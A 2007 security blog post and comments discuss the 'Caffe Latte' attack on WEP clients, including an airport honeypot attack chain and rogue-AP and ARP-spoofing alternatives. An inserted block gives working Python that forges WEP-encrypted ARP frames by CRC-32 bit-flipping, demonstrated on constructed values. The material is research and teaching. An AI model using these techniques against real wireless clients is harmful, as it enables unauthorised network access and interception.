Sunday, October 21, 2007

A Little Wi-Fi Hacking With Your Half-Caf Nonfat Mochachino?

So like, literally right now Vivek and Sohail from AirTight Networks are presenting a new attack on WEP at Toorcon. The new technique, cheekily dubbed Caffe Latte, attacks clients instead of access points. But according to an interview the researchers gave before Toorcon, the attack can take anywhere from a few minutes to a few hours, which makes it no more efficient than existing techniques.

Cool research, guys, but I guess the question I have is this. If I need to attack a mobile client instead of an access point in order to avoid detection by, I dunno, a wireless IDS of some sort - and I have to struggle with the position and availability of the target, no less - won't I be shocked to discover that your technique works because this highly secure wireless network uses WEP?!

I'm just saying. Attacks against wireless clients in the field are interesting, and fertile ground for all sorts of cool hacks and lucrative crime. But - and maybe I'm missing the obvious here - I don't get it.


Anonymous said...

Hi Paul,

Actually, we refined the attack, and now it takes less than 6 minutes rather than 30 minutes.

Answering your question: our idea was to prove that the client itself can be hacked if it uses WEP. Picture this: a hacker scans the air at an airport and finds a client which probes for a wireless network. If this network uses WEP, current tools such as Karma cannot do much, but using the Caffe Latte attack they can first break the WEP key for that network, then bring up a honeypot with that WEP key, have the client associate with this honeypot, and then gain IP-layer connectivity. Once IP-layer connectivity is gained, all the hacker needs is a vulnerability scanner. You know the rest of the story now :)

You can download the ppt from:

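The step in the chain above that makes a client-side WEP attack possible at all is that the fake AP can get the client to generate traffic without knowing the key: WEP's integrity check is a plain CRC-32, which is affine, so anyone can flip bits in an encrypted frame and fix up the encrypted ICV to match. Caffe Latte applies this to the gratuitous ARP a client sends after associating, turning it into an ARP request the client will answer, so the attacker harvests fresh IVs for the key-recovery step. The following Python is an added illustration of that bit-flipping property and is not the researchers' code or anything from their slides; the WEP key, IV, MAC and IP addresses are constructed sample values, the ARP body omits the LLC/SNAP header, and the field offset and "guessed sender IP" are assumptions standing in for what the attacker would guess in the field.

```python
import struct
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); WEP seeds it with IV || shared key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def crc32(data: bytes) -> int:
    return zlib.crc32(data) & 0xFFFFFFFF


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Victim side: IV (3 bytes, sent in clear) || RC4(IV||key, plaintext || ICV).
    The ICV is the little-endian CRC-32 of the plaintext, as in 802.11 WEP."""
    icv = struct.pack("<I", crc32(plaintext))
    return iv + rc4(iv + key, plaintext + icv)


def wep_decrypt(key: bytes, frame: bytes):
    """Victim side: returns (plaintext, icv_ok). A real client drops frames with a bad ICV."""
    iv, body = frame[:3], frame[3:]
    pt_icv = rc4(iv + key, body)
    pt, icv = pt_icv[:-4], pt_icv[-4:]
    return pt, struct.unpack("<I", icv)[0] == crc32(pt)


def flip_bits(frame: bytes, delta: bytes) -> bytes:
    """Attacker side: XOR `delta` into the encrypted payload and patch the encrypted ICV,
    without the key. CRC-32 is affine: crc(a ^ b) == crc(a) ^ crc(b) ^ crc(0...0) for
    equal lengths, so the ICV changes by crc(delta) ^ crc(zeros), which the attacker can
    compute and XOR into the encrypted ICV (RC4 is a stream cipher, so XOR commutes)."""
    iv, ct, ct_icv = frame[:3], frame[3:-4], frame[-4:]
    if len(delta) != len(ct):
        raise ValueError("delta must cover the whole encrypted payload")
    icv_delta = struct.pack("<I", crc32(delta) ^ crc32(bytes(len(delta))))
    new_ct = bytes(a ^ b for a, b in zip(ct, delta))
    new_icv = bytes(a ^ b for a, b in zip(ct_icv, icv_delta))
    return iv + new_ct + new_icv


# --- constructed sample values (not captured data) ---
KEY = bytes.fromhex("0102030405")   # constructed 40-bit WEP key, known only to the "client"
IV = b"\x00\x00\x01"
CLIENT_MAC = bytes.fromhex("001122334455")
CLIENT_IP = bytes([192, 168, 1, 5])

ARP_SPA_OFFSET = 14  # htype(2) ptype(2) hlen(1) plen(1) oper(2) sha(6) -> sender IP at 14


def build_arp(oper: int, sha: bytes, spa: bytes, tha: bytes, tpa: bytes) -> bytes:
    """Minimal 28-byte ARP body; the LLC/SNAP header is omitted for brevity."""
    return struct.pack("!HHBBH", 1, 0x0800, 6, 4, oper) + sha + spa + tha + tpa


def client_gratuitous_arp() -> bytes:
    """What a client typically sends right after associating: 'who has my IP? tell me'."""
    body = build_arp(1, CLIENT_MAC, CLIENT_IP, bytes(6), CLIENT_IP)
    return wep_encrypt(KEY, IV, body)


def attacker_forge_request(captured: bytes, guessed_spa: bytes, new_spa: bytes) -> bytes:
    """Turn the captured gratuitous ARP into a request from a different sender IP so the
    client will answer it. The attacker needs only the field offset and a guess of the
    current sender IP (assumed here; the real attack guesses common private ranges)."""
    payload_len = len(captured) - 3 - 4
    delta = bytearray(payload_len)
    for k, (g, n) in enumerate(zip(guessed_spa, new_spa)):
        delta[ARP_SPA_OFFSET + k] = g ^ n
    return flip_bits(captured, bytes(delta))


def demo():
    captured = client_gratuitous_arp()
    forged = attacker_forge_request(captured, CLIENT_IP, bytes([192, 168, 1, 1]))
    plaintext, icv_ok = wep_decrypt(KEY, forged)  # the client's view of the forged frame
    return plaintext[ARP_SPA_OFFSET:ARP_SPA_OFFSET + 4], icv_ok


if __name__ == "__main__":
    spa, ok = demo()
    print("sender IP seen by client:", ".".join(map(str, spa)), "ICV valid:", ok)
```

Note that the client accepts the forged frame as a valid ARP request from 192.168.1.1 even though the attacker never touched the key; every reply it sends is a fresh WEP-encrypted packet with a new IV, which is exactly the material the key-recovery step in the comment above needs. A naive edit of the ciphertext without the ICV fix-up is discarded by the client, so the affine CRC is the whole trick.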
PaulM said...

If the attack is reliably below 6 minutes, then that's a more valuable attack because it's faster than attacking the AP with aireplay & friends.

I can also sort-of-maybe see your use case for trying to spoof an AP to a client at a public venue like an airport or coffee shop. However, it seems far easier to sniff for client beacons that use no encryption and spoof those APs. Or to just spoof an official-sounding AP name and wait for people to attach to you. Or to associate to the official AP. These all get you direct IP access, and the last one even gets you MiTM with a little ARP spoofing.

But it's cool research nonetheless.